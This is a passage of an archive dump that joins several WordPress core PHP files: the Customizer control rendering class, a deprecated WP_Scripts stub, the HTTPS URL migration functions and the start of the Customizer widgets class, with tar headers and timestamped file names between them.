* @param WP_Customize_Control $control WP_Customize_Control instance.
*/
$active = apply_filters( 'customize_control_active', $active, $control );
return $active;
}
/**
* Default callback used when invoking WP_Customize_Control::active().
*
* Subclasses can override this with their specific logic, or they may
* provide an 'active_callback' argument to the constructor.
*
* @since 4.0.0
*
* @return true Always true.
*/
public function active_callback() {
return true;
}
/**
* Fetches a setting's value.
* Grabs the main setting by default.
*
* @since 3.4.0
*
* @param string $setting_key
* @return mixed The requested setting's value, if the setting exists.
*/
final public function value( $setting_key = 'default' ) {
if ( isset( $this->settings[ $setting_key ] ) ) {
return $this->settings[ $setting_key ]->value();
}
}
/**
* Refreshes the parameters passed to the JavaScript via JSON.
*
* @since 3.4.0
*/
public function to_json() {
$this->json['settings'] = array();
foreach ( $this->settings as $key => $setting ) {
$this->json['settings'][ $key ] = $setting->id;
}
$this->json['type'] = $this->type;
$this->json['priority'] = $this->priority;
$this->json['active'] = $this->active();
$this->json['section'] = $this->section;
$this->json['content'] = $this->get_content();
$this->json['label'] = $this->label;
$this->json['description'] = $this->description;
$this->json['instanceNumber'] = $this->instance_number;
if ( 'dropdown-pages' === $this->type ) {
$this->json['allow_addition'] = $this->allow_addition;
}
}
/**
* Gets the data to export to the client via JSON.
*
* @since 4.1.0
*
* @return array Array of parameters passed to the JavaScript.
*/
public function json() {
$this->to_json();
return $this->json;
}
/**
* Checks if the user can use this control.
*
* Returns false if the user cannot manipulate one of the associated settings,
* or if one of the associated settings does not exist. Also returns false if
* the associated section does not exist or if its capability check returns
* false.
*
* @since 3.4.0
*
* @return bool False if theme doesn't support the control or user doesn't have the required permissions, otherwise true.
*/
final public function check_capabilities() {
if ( ! empty( $this->capability ) && ! current_user_can( $this->capability ) ) {
return false;
}
foreach ( $this->settings as $setting ) {
if ( ! $setting || ! $setting->check_capabilities() ) {
return false;
}
}
$section = $this->manager->get_section( $this->section );
if ( isset( $section ) && ! $section->check_capabilities() ) {
return false;
}
return true;
}
/**
* Gets the control's content for insertion into the Customizer pane.
*
* @since 4.1.0
*
* @return string Contents of the control.
*/
final public function get_content() {
ob_start();
$this->maybe_render();
return trim( ob_get_clean() );
}
/**
* Checks capabilities and render the control.
*
* @since 3.4.0
* @uses WP_Customize_Control::render()
*/
final public function maybe_render() {
if ( ! $this->check_capabilities() ) {
return;
}
/**
* Fires just before the current Customizer control is rendered.
*
* @since 3.4.0
*
* @param WP_Customize_Control $control WP_Customize_Control instance.
*/
do_action( 'customize_render_control', $this );
/**
* Fires just before a specific Customizer control is rendered.
*
* The dynamic portion of the hook name, `$this->id`, refers to
* the control ID.
*
* @since 3.4.0
*
* @param WP_Customize_Control $control WP_Customize_Control instance.
*/
do_action( "customize_render_control_{$this->id}", $this );
$this->render();
}
/**
* Renders the control wrapper and calls $this->render_content() for the internals.
*
* @since 3.4.0
*/
protected function render() {
$id = 'customize-control-' . str_replace( array( '[', ']' ), array( '-', '' ), $this->id );
$class = 'customize-control customize-control-' . $this->type;
printf( '<li id="%s" class="%s">', esc_attr( $id ), esc_attr( $class ) );
$this->render_content();
echo '</li>';
}
/**
* Gets the data link attribute for a setting.
*
* @since 3.4.0
* @since 4.9.0 Return a `data-customize-setting-key-link` attribute if a setting is not registered for the supplied setting key.
*
* @param string $setting_key
* @return string Data link parameter, a `data-customize-setting-link` attribute if the `$setting_key` refers
* to a pre-registered setting, and a `data-customize-setting-key-link` attribute if the setting
* is not yet registered.
*/
public function get_link( $setting_key = 'default' ) {
if ( isset( $this->settings[ $setting_key ] ) && $this->settings[ $setting_key ] instanceof WP_Customize_Setting ) {
return 'data-customize-setting-link="' . esc_attr( $this->settings[ $setting_key ]->id ) . '"';
} else {
return 'data-customize-setting-key-link="' . esc_attr( $setting_key ) . '"';
}
}
/**
* Renders the data link attribute for the control's input element.
*
* @since 3.4.0
* @uses WP_Customize_Control::get_link()
*
* @param string $setting_key Default 'default'.
*/
public function link( $setting_key = 'default' ) {
echo $this->get_link( $setting_key );
}
/**
* Renders the custom attributes for the control's input element.
*
* @since 4.0.0
*/
public function input_attrs() {
foreach ( $this->input_attrs as $attr => $value ) {
echo $attr . '="' . esc_attr( $value ) . '" ';
}
}
/**
* Renders the control's content.
*
* Allows the content to be overridden without having to rewrite the wrapper in `$this::render()`.
*
* Supports basic input types `text`, `checkbox`, `textarea`, `radio`, `select` and `dropdown-pages`.
* Additional input types such as `email`, `url`, `number`, `hidden` and `date` are supported implicitly.
*
* Control content can alternately be rendered in JS. See WP_Customize_Control::print_template().
*
* @since 3.4.0
*/
protected function render_content() {
$input_id = '_customize-input-' . $this->id;
$description_id = '_customize-description-' . $this->id;
$describedby_attr = ( ! empty( $this->description ) ) ? ' aria-describedby="' . esc_attr( $description_id ) . '" ' : '';
switch ( $this->type ) {
case 'checkbox':
?>
<span class="customize-inside-control-row">
<input
id="<?php echo esc_attr( $input_id ); ?>"
<?php echo $describedby_attr; ?>
type="checkbox"
value="<?php echo esc_attr( $this->value() ); ?>"
<?php $this->link(); ?>
<?php checked( $this->value() ); ?>
/>
<label for="<?php echo esc_attr( $input_id ); ?>"><?php echo esc_html( $this->label ); ?></label>
<?php if ( ! empty( $this->description ) ) : ?>
<span id="<?php echo esc_attr( $description_id ); ?>" class="description customize-control-description"><?php echo $this->description; ?></span>
<?php endif; ?>
</span>
<?php
break;
case 'radio':
if ( empty( $this->choices ) ) {
return;
}
$name = '_customize-radio-' . $this->id;
?>
<?php if ( ! empty( $this->label ) ) : ?>
<span class="customize-control-title"><?php echo esc_html( $this->label ); ?></span>
<?php endif; ?>
<?php if ( ! empty( $this->description ) ) : ?>
<span id="<?php echo esc_attr( $description_id ); ?>" class="description customize-control-description"><?php echo $this->description; ?></span>
<?php endif; ?>
<?php foreach ( $this->choices as $value => $label ) : ?>
<span class="customize-inside-control-row">
<input
id="<?php echo esc_attr( $input_id . '-radio-' . $value ); ?>"
type="radio"
<?php echo $describedby_attr; ?>
value="<?php echo esc_attr( $value ); ?>"
name="<?php echo esc_attr( $name ); ?>"
<?php $this->link(); ?>
<?php checked( $this->value(), $value ); ?>
/>
<label for="<?php echo esc_attr( $input_id . '-radio-' . $value ); ?>"><?php echo esc_html( $label ); ?></label>
</span>
<?php endforeach; ?>
<?php
break;
case 'select':
if ( empty( $this->choices ) ) {
return;
}
?>
<?php if ( ! empty( $this->label ) ) : ?>
<label for="<?php echo esc_attr( $input_id ); ?>" class="customize-control-title"><?php echo esc_html( $this->label ); ?></label>
<?php endif; ?>
<?php if ( ! empty( $this->description ) ) : ?>
<span id="<?php echo esc_attr( $description_id ); ?>" class="description customize-control-description"><?php echo $this->description; ?></span>
<?php endif; ?>
<select id="<?php echo esc_attr( $input_id ); ?>" <?php echo $describedby_attr; ?> <?php $this->link(); ?>>
<?php
foreach ( $this->choices as $value => $label ) {
echo '<option value="' . esc_attr( $value ) . '"' . selected( $this->value(), $value, false ) . '>' . esc_html( $label ) . '</option>';
}
?>
</select>
<?php
break;
case 'textarea':
if ( ! array_key_exists( 'rows', $this->input_attrs ) ) {
$this->input_attrs['rows'] = 5;
}
?>
<?php if ( ! empty( $this->label ) ) : ?>
<label for="<?php echo esc_attr( $input_id ); ?>" class="customize-control-title"><?php echo esc_html( $this->label ); ?></label>
<?php endif; ?>
<?php if ( ! empty( $this->description ) ) : ?>
<span id="<?php echo esc_attr( $description_id ); ?>" class="description customize-control-description"><?php echo $this->description; ?></span>
<?php endif; ?>
<textarea
id="<?php echo esc_attr( $input_id ); ?>"
<?php echo $describedby_attr; ?>
<?php $this->input_attrs(); ?>
<?php $this->link(); ?>
><?php echo esc_textarea( $this->value() ); ?></textarea>
<?php
break;
case 'dropdown-pages':
?>
<?php if ( ! empty( $this->label ) ) : ?>
<label for="<?php echo esc_attr( $input_id ); ?>" class="customize-control-title"><?php echo esc_html( $this->label ); ?></label>
<?php endif; ?>
<?php if ( ! empty( $this->description ) ) : ?>
<span id="<?php echo esc_attr( $description_id ); ?>" class="description customize-control-description"><?php echo $this->description; ?></span>
<?php endif; ?>
<?php
$dropdown_name = '_customize-dropdown-pages-' . $this->id;
$show_option_none = __( '— Select —' );
$option_none_value = '0';
$dropdown = wp_dropdown_pages(
array(
'name' => $dropdown_name,
'echo' => 0,
'show_option_none' => $show_option_none,
'option_none_value' => $option_none_value,
'selected' => $this->value(),
)
);
if ( empty( $dropdown ) ) {
$dropdown = sprintf( '<select id="%1$s" name="%1$s">', esc_attr( $dropdown_name ) );
$dropdown .= sprintf( '<option value="%1$s">%2$s</option>', esc_attr( $option_none_value ), esc_html( $show_option_none ) );
$dropdown .= '</select>';
}
// Hackily add in the data link parameter.
$dropdown = str_replace( '<select', '<select ' . $this->get_link() . ' id="' . esc_attr( $input_id ) . '" ' . $describedby_attr, $dropdown );
/*
* Even more hackily add auto-draft page stubs.
* @todo Eventually this should be removed in favor of the pages being injected into the underlying get_pages() call.
* See <https://github.com/xwp/wp-customize-posts/pull/250>.
*/
$nav_menus_created_posts_setting = $this->manager->get_setting( 'nav_menus_created_posts' );
if ( $nav_menus_created_posts_setting && current_user_can( 'publish_pages' ) ) {
$auto_draft_page_options = '';
foreach ( $nav_menus_created_posts_setting->value() as $auto_draft_page_id ) {
$post = get_post( $auto_draft_page_id );
if ( $post && 'page' === $post->post_type ) {
$auto_draft_page_options .= sprintf( '<option value="%1$s">%2$s</option>', esc_attr( $post->ID ), esc_html( $post->post_title ) );
}
}
if ( $auto_draft_page_options ) {
$dropdown = str_replace( '</select>', $auto_draft_page_options . '</select>', $dropdown );
}
}
echo $dropdown;
?>
<?php if ( $this->allow_addition && current_user_can( 'publish_pages' ) && current_user_can( 'edit_theme_options' ) ) : // Currently tied to menus functionality. ?>
<button type="button" class="button-link add-new-toggle">
<?php
/* translators: %s: Add Page label. */
printf( __( '+ %s' ), get_post_type_object( 'page' )->labels->add_new_item );
?>
</button>
<div class="new-content-item-wrapper">
<label for="create-input-<?php echo esc_attr( $this->id ); ?>"><?php _e( 'New page title' ); ?></label>
<div class="new-content-item">
<input type="text" id="create-input-<?php echo esc_attr( $this->id ); ?>" class="create-item-input form-required">
<button type="button" class="button add-content"><?php _e( 'Add' ); ?></button>
</div>
<span id="create-input-<?php echo esc_attr( $this->id ); ?>-error" class="create-item-error error-message" style="display: none;"><?php _e( 'Please enter a page title' ); ?></span>
</div>
<?php endif; ?>
<?php
break;
default:
?>
<?php if ( ! empty( $this->label ) ) : ?>
<label for="<?php echo esc_attr( $input_id ); ?>" class="customize-control-title"><?php echo esc_html( $this->label ); ?></label>
<?php endif; ?>
<?php if ( ! empty( $this->description ) ) : ?>
<span id="<?php echo esc_attr( $description_id ); ?>" class="description customize-control-description"><?php echo $this->description; ?></span>
<?php endif; ?>
<input
id="<?php echo esc_attr( $input_id ); ?>"
type="<?php echo esc_attr( $this->type ); ?>"
<?php echo $describedby_attr; ?>
<?php $this->input_attrs(); ?>
<?php if ( ! isset( $this->input_attrs['value'] ) ) : ?>
value="<?php echo esc_attr( $this->value() ); ?>"
<?php endif; ?>
<?php $this->link(); ?>
/>
<?php
break;
}
}
/**
* Renders the control's JS template.
*
* This function is only run for control types that have been registered with
* WP_Customize_Manager::register_control_type().
*
* In the future, this will also print the template for the control's container
* element and be override-able.
*
* @since 4.1.0
*/
final public function print_template() {
?>
<script type="text/html" id="tmpl-customize-control-<?php echo esc_attr( $this->type ); ?>-content">
<?php $this->content_template(); ?>
</script>
<?php
}
/**
* An Underscore (JS) template for this control's content (but not its container).
*
* Class variables for this control class are available in the `data` JS object;
* export custom variables by overriding WP_Customize_Control::to_json().
*
* @see WP_Customize_Control::print_template()
*
* @since 4.1.0
*/
protected function content_template() {}
}
/**
* WP_Customize_Color_Control class.
*/
require_once ABSPATH . WPINC . '/customize/class-wp-customize-color-control.php';
/**
* WP_Customize_Media_Control class.
*/
require_once ABSPATH . WPINC . '/customize/class-wp-customize-media-control.php';
/**
* WP_Customize_Upload_Control class.
*/
require_once ABSPATH . WPINC . '/customize/class-wp-customize-upload-control.php';
/**
* WP_Customize_Image_Control class.
*/
require_once ABSPATH . WPINC . '/customize/class-wp-customize-image-control.php';
/**
* WP_Customize_Background_Image_Control class.
*/
require_once ABSPATH . WPINC . '/customize/class-wp-customize-background-image-control.php';
/**
* WP_Customize_Background_Position_Control class.
*/
require_once ABSPATH . WPINC . '/customize/class-wp-customize-background-position-control.php';
/**
* WP_Customize_Cropped_Image_Control class.
*/
require_once ABSPATH . WPINC . '/customize/class-wp-customize-cropped-image-control.php';
/**
* WP_Customize_Site_Icon_Control class.
*/
require_once ABSPATH . WPINC . '/customize/class-wp-customize-site-icon-control.php';
/**
* WP_Customize_Header_Image_Control class.
*/
require_once ABSPATH . WPINC . '/customize/class-wp-customize-header-image-control.php';
/**
* WP_Customize_Theme_Control class.
*/
require_once ABSPATH . WPINC . '/customize/class-wp-customize-theme-control.php';
/**
* WP_Widget_Area_Customize_Control class.
*/
require_once ABSPATH . WPINC . '/customize/class-wp-widget-area-customize-control.php';
/**
* WP_Widget_Form_Customize_Control class.
*/
require_once ABSPATH . WPINC . '/customize/class-wp-widget-form-customize-control.php';
/**
* WP_Customize_Nav_Menu_Control class.
*/
require_once ABSPATH . WPINC . '/customize/class-wp-customize-nav-menu-control.php';
/**
* WP_Customize_Nav_Menu_Item_Control class.
*/
require_once ABSPATH . WPINC . '/customize/class-wp-customize-nav-menu-item-control.php';
/**
* WP_Customize_Nav_Menu_Location_Control class.
*/
require_once ABSPATH . WPINC . '/customize/class-wp-customize-nav-menu-location-control.php';
/**
* WP_Customize_Nav_Menu_Name_Control class.
*
* As this file is deprecated, it will trigger a deprecation notice if instantiated. In a subsequent
* release, the require_once here will be removed and _deprecated_file() will be called if file is
* required at all.
*
* @deprecated 4.9.0 This file is no longer used due to new menu creation UX.
*/
require_once ABSPATH . WPINC . '/customize/class-wp-customize-nav-menu-name-control.php';
/**
* WP_Customize_Nav_Menu_Locations_Control class.
*/
require_once ABSPATH . WPINC . '/customize/class-wp-customize-nav-menu-locations-control.php';
/**
* WP_Customize_Nav_Menu_Auto_Add_Control class.
*/
require_once ABSPATH . WPINC . '/customize/class-wp-customize-nav-menu-auto-add-control.php';
/**
* WP_Customize_Date_Time_Control class.
*/
require_once ABSPATH . WPINC . '/customize/class-wp-customize-date-time-control.php';
/**
* WP_Sidebar_Block_Editor_Control class.
*/
require_once ABSPATH . WPINC . '/customize/class-wp-sidebar-block-editor-control.php';
class.wp-scripts-20260605024152.php 0000666 00000000527 15224151220 0012056 0 ustar 00 <?php
/**
* Dependencies API: WP_Scripts class
*
* This file is deprecated, use 'wp-includes/class-wp-scripts.php' instead.
*
* @deprecated 6.1.0
* @package WordPress
*/
_deprecated_file( basename( __FILE__ ), '6.1.0', WPINC . '/class-wp-scripts.php' );
/** WP_Scripts class */
require_once ABSPATH . WPINC . '/class-wp-scripts.php';
https-migration-20260606042005-20260621081108-20260621205600.php 0000666 00000011205 15224151220 0014720 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
class-wp-customize-widgets-20260621123822.php 0000666 00000215637 15224151220 0014070 0 ustar 00 <?php
/**
* WordPress Customize Widgets classes
*
* @package WordPress
* @subpackage Customize
* @since 3.9.0
*/
/**
* Customize Widgets class.
*
* Implements widget management in the Customizer.
*
* @since 3.9.0
*
* @see WP_Customize_Manager
*/
#[AllowDynamicProperties]
final class WP_Customize_Widgets {
/**
* WP_Customize_Manager instance.
*
* @since 3.9.0
* @var WP_Customize_Manager
*/
public $manager;
/**
* All id_bases for widgets defined in core.
*
* @since 3.9.0
* @var array
*/
protected $core_widget_id_bases = array(
'archives',
'calendar',
'categories',
'custom_html',
'links',
'media_audio',
'media_image',
'media_video',
'meta',
'nav_menu',
'pages',
'recent-comments',
'recent-posts',
'rss',
'search',
'tag_cloud',
'text',
);
/**
* @since 3.9.0
* @var array
*/
protected $rendered_sidebars = array();
/**
* @since 3.9.0
* @var array
*/
protected $rendered_widgets = array();
/**
* @since 3.9.0
* @var array
*/
protected $old_sidebars_widgets = array();
/**
* Mapping of widget ID base to whether it supports selective refresh.
*
* @since 4.5.0
* @var array
*/
protected $selective_refreshable_widgets;
/**
* Mapping of setting type to setting ID pattern.
*
* @since 4.2.0
* @var array
*/
protected $setting_id_patterns = array(
'widget_instance' => '/^widget_(?P<id_base>.+?)(?:\[(?P<widget_number>\d+)\])?$/',
'sidebar_widgets' => '/^sidebars_widgets\[(?P<sidebar_id>.+?)\]$/',
);
/**
* Initial loader.
*
* @since 3.9.0
*
* @param WP_Customize_Manager $manager Customizer bootstrap instance.
*/
public function __construct( $manager ) {
$this->manager = $manager;
// See https://github.com/xwp/wp-customize-snapshots/blob/962586659688a5b1fd9ae93618b7ce2d4e7a421c/php/class-customize-snapshot-manager.php#L420-L449
add_filter( 'customize_dynamic_setting_args', array( $this, 'filter_customize_dynamic_setting_args' ), 10, 2 );
add_action( 'widgets_init', array( $this, 'register_settings' ), 95 );
add_action( 'customize_register', array( $this, 'schedule_customize_register' ), 1 );
// Skip remaining hooks when the user can't manage widgets anyway.
if ( ! current_user_can( 'edit_theme_options' ) ) {
return;
}
add_action( 'wp_loaded', array( $this, 'override_sidebars_widgets_for_theme_switch' ) );
add_action( 'customize_controls_init', array( $this, 'customize_controls_init' ) );
add_action( 'customize_controls_enqueue_scripts', array( $this, 'enqueue_scripts' ) );
add_action( 'customize_controls_print_styles', array( $this, 'print_styles' ) );
add_action( 'customize_controls_print_scripts', array( $this, 'print_scripts' ) );
add_action( 'customize_controls_print_footer_scripts', array( $this, 'print_footer_scripts' ) );
add_action( 'customize_controls_print_footer_scripts', array( $this, 'output_widget_control_templates' ) );
add_action( 'customize_preview_init', array( $this, 'customize_preview_init' ) );
add_filter( 'customize_refresh_nonces', array( $this, 'refresh_nonces' ) );
add_filter( 'should_load_block_editor_scripts_and_styles', array( $this, 'should_load_block_editor_scripts_and_styles' ) );
add_action( 'dynamic_sidebar', array( $this, 'tally_rendered_widgets' ) );
add_filter( 'is_active_sidebar', array( $this, 'tally_sidebars_via_is_active_sidebar_calls' ), 10, 2 );
add_filter( 'dynamic_sidebar_has_widgets', array( $this, 'tally_sidebars_via_dynamic_sidebar_calls' ), 10, 2 );
// Selective Refresh.
add_filter( 'customize_dynamic_partial_args', array( $this, 'customize_dynamic_partial_args' ), 10, 2 );
add_action( 'customize_preview_init', array( $this, 'selective_refresh_init' ) );
}
/**
* List whether each registered widget can be use selective refresh.
*
* If the theme does not support the customize-selective-refresh-widgets feature,
* then this will always return an empty array.
*
* @since 4.5.0
*
* @global WP_Widget_Factory $wp_widget_factory
*
* @return array Mapping of id_base to support. If theme doesn't support
* selective refresh, an empty array is returned.
*/
public function get_selective_refreshable_widgets() {
global $wp_widget_factory;
if ( ! current_theme_supports( 'customize-selective-refresh-widgets' ) ) {
return array();
}
if ( ! isset( $this->selective_refreshable_widgets ) ) {
$this->selective_refreshable_widgets = array();
foreach ( $wp_widget_factory->widgets as $wp_widget ) {
$this->selective_refreshable_widgets[ $wp_widget->id_base ] = ! empty( $wp_widget->widget_options['customize_selective_refresh'] );
}
}
return $this->selective_refreshable_widgets;
}
/**
* Determines if a widget supports selective refresh.
*
* @since 4.5.0
*
* @param string $id_base Widget ID Base.
* @return bool Whether the widget can be selective refreshed.
*/
public function is_widget_selective_refreshable( $id_base ) {
$selective_refreshable_widgets = $this->get_selective_refreshable_widgets();
return ! empty( $selective_refreshable_widgets[ $id_base ] );
}
/**
* Retrieves the widget setting type given a setting ID.
*
* @since 4.2.0
*
* @param string $setting_id Setting ID.
* @return string|void Setting type.
*/
protected function get_setting_type( $setting_id ) {
static $cache = array();
if ( isset( $cache[ $setting_id ] ) ) {
return $cache[ $setting_id ];
}
foreach ( $this->setting_id_patterns as $type => $pattern ) {
if ( preg_match( $pattern, $setting_id ) ) {
$cache[ $setting_id ] = $type;
return $type;
}
}
}
/**
* Inspects the incoming customized data for any widget settings, and dynamically adds
* them up-front so widgets will be initialized properly.
*
* @since 4.2.0
*/
public function register_settings() {
$widget_setting_ids = array();
$incoming_setting_ids = array_keys( $this->manager->unsanitized_post_values() );
foreach ( $incoming_setting_ids as $setting_id ) {
if ( ! is_null( $this->get_setting_type( $setting_id ) ) ) {
$widget_setting_ids[] = $setting_id;
}
}
if ( $this->manager->doing_ajax( 'update-widget' ) && isset( $_REQUEST['widget-id'] ) ) {
$widget_setting_ids[] = $this->get_setting_id( wp_unslash( $_REQUEST['widget-id'] ) );
}
$settings = $this->manager->add_dynamic_settings( array_unique( $widget_setting_ids ) );
if ( $this->manager->settings_previewed() ) {
foreach ( $settings as $setting ) {
$setting->preview();
}
}
}
/**
* Determines the arguments for a dynamically-created setting.
*
* @since 4.2.0
*
* @param false|array $args The arguments to the WP_Customize_Setting constructor.
* @param string $setting_id ID for dynamic setting, usually coming from `$_POST['customized']`.
* @return array|false Setting arguments, false otherwise.
*/
public function filter_customize_dynamic_setting_args( $args, $setting_id ) {
if ( $this->get_setting_type( $setting_id ) ) {
$args = $this->get_setting_args( $setting_id );
}
return $args;
}
/**
* Retrieves an unslashed post value or return a default.
*
* @since 3.9.0
*
* @param string $name Post value.
* @param mixed $default_value Default post value.
* @return mixed Unslashed post value or default value.
*/
protected function get_post_value( $name, $default_value = null ) {
if ( ! isset( $_POST[ $name ] ) ) {
return $default_value;
}
return wp_unslash( $_POST[ $name ] );
}
/**
* Override sidebars_widgets for theme switch.
*
* When switching a theme via the Customizer, supply any previously-configured
* sidebars_widgets from the target theme as the initial sidebars_widgets
* setting. Also store the old theme's existing settings so that they can
* be passed along for storing in the sidebars_widgets theme_mod when the
* theme gets switched.
*
* @since 3.9.0
*
* @global array $sidebars_widgets
* @global array $_wp_sidebars_widgets
*/
public function override_sidebars_widgets_for_theme_switch() {
global $sidebars_widgets;
if ( $this->manager->doing_ajax() || $this->manager->is_theme_active() ) {
return;
}
$this->old_sidebars_widgets = wp_get_sidebars_widgets();
add_filter( 'customize_value_old_sidebars_widgets_data', array( $this, 'filter_customize_value_old_sidebars_widgets_data' ) );
$this->manager->set_post_value( 'old_sidebars_widgets_data', $this->old_sidebars_widgets ); // Override any value cached in changeset.
// retrieve_widgets() looks at the global $sidebars_widgets.
$sidebars_widgets = $this->old_sidebars_widgets;
$sidebars_widgets = retrieve_widgets( 'customize' );
add_filter( 'option_sidebars_widgets', array( $this, 'filter_option_sidebars_widgets_for_theme_switch' ), 1 );
// Reset global cache var used by wp_get_sidebars_widgets().
unset( $GLOBALS['_wp_sidebars_widgets'] );
}
/**
* Filters old_sidebars_widgets_data Customizer setting.
*
* When switching themes, filter the Customizer setting old_sidebars_widgets_data
* to supply initial $sidebars_widgets before they were overridden by retrieve_widgets().
* The value for old_sidebars_widgets_data gets set in the old theme's sidebars_widgets
* theme_mod.
*
* @since 3.9.0
*
* @see WP_Customize_Widgets::handle_theme_switch()
*
* @param array $old_sidebars_widgets
* @return array
*/
public function filter_customize_value_old_sidebars_widgets_data( $old_sidebars_widgets ) {
return $this->old_sidebars_widgets;
}
/**
* Filters sidebars_widgets option for theme switch.
*
* When switching themes, the retrieve_widgets() function is run when the Customizer initializes,
* and then the new sidebars_widgets here get supplied as the default value for the sidebars_widgets
* option.
*
* @since 3.9.0
*
* @see WP_Customize_Widgets::handle_theme_switch()
* @global array $sidebars_widgets
*
* @param array $sidebars_widgets
* @return array
*/
public function filter_option_sidebars_widgets_for_theme_switch( $sidebars_widgets ) {
$sidebars_widgets = $GLOBALS['sidebars_widgets'];
$sidebars_widgets['array_version'] = 3;
return $sidebars_widgets;
}
/**
* Ensures all widgets get loaded into the Customizer.
*
* Note: these actions are also fired in wp_ajax_update_widget().
*
* @since 3.9.0
*/
public function customize_controls_init() {
/** This action is documented in wp-admin/includes/ajax-actions.php */
do_action( 'load-widgets.php' ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores
/** This action is documented in wp-admin/includes/ajax-actions.php */
do_action( 'widgets.php' ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores
/** This action is documented in wp-admin/widgets.php */
do_action( 'sidebar_admin_setup' );
}
/**
* Ensures widgets are available for all types of previews.
*
* When in preview, hook to {@see 'customize_register'} for settings after WordPress is loaded
* so that all filters have been initialized (e.g. Widget Visibility).
*
* @since 3.9.0
*/
public function schedule_customize_register() {
if ( is_admin() ) {
$this->customize_register();
} else {
add_action( 'wp', array( $this, 'customize_register' ) );
}
}
/**
* Registers Customizer settings and controls for all sidebars and widgets.
*
* @since 3.9.0
*
* @global array $wp_registered_widgets
* @global array $wp_registered_widget_controls
* @global array $wp_registered_sidebars
*/
public function customize_register() {
global $wp_registered_widgets, $wp_registered_widget_controls, $wp_registered_sidebars;
$use_widgets_block_editor = wp_use_widgets_block_editor();
add_filter( 'sidebars_widgets', array( $this, 'preview_sidebars_widgets' ), 1 );
$sidebars_widgets = array_merge(
array( 'wp_inactive_widgets' => array() ),
array_fill_keys( array_keys( $wp_registered_sidebars ), array() ),
wp_get_sidebars_widgets()
);
$new_setting_ids = array();
/*
* Register a setting for all widgets, including those which are active,
* inactive, and orphaned since a widget may get suppressed from a sidebar
* via a plugin (like Widget Visibility).
*/
foreach ( array_keys( $wp_registered_widgets ) as $widget_id ) {
$setting_id = $this->get_setting_id( $widget_id );
$setting_args = $this->get_setting_args( $setting_id );
if ( ! $this->manager->get_setting( $setting_id ) ) {
$this->manager->add_setting( $setting_id, $setting_args );
}
$new_setting_ids[] = $setting_id;
}
/*
* Add a setting which will be supplied for the theme's sidebars_widgets
* theme_mod when the theme is switched.
*/
if ( ! $this->manager->is_theme_active() ) {
$setting_id = 'old_sidebars_widgets_data';
$setting_args = $this->get_setting_args(
$setting_id,
array(
'type' => 'global_variable',
'dirty' => true,
)
);
$this->manager->add_setting( $setting_id, $setting_args );
}
$this->manager->add_panel(
'widgets',
array(
'type' => 'widgets',
'title' => __( 'Widgets' ),
'description' => __( 'Widgets are independent sections of content that can be placed into widgetized areas provided by your theme (commonly called sidebars).' ),
'priority' => 110,
'active_callback' => array( $this, 'is_panel_active' ),
'auto_expand_sole_section' => true,
'theme_supports' => 'widgets',
)
);
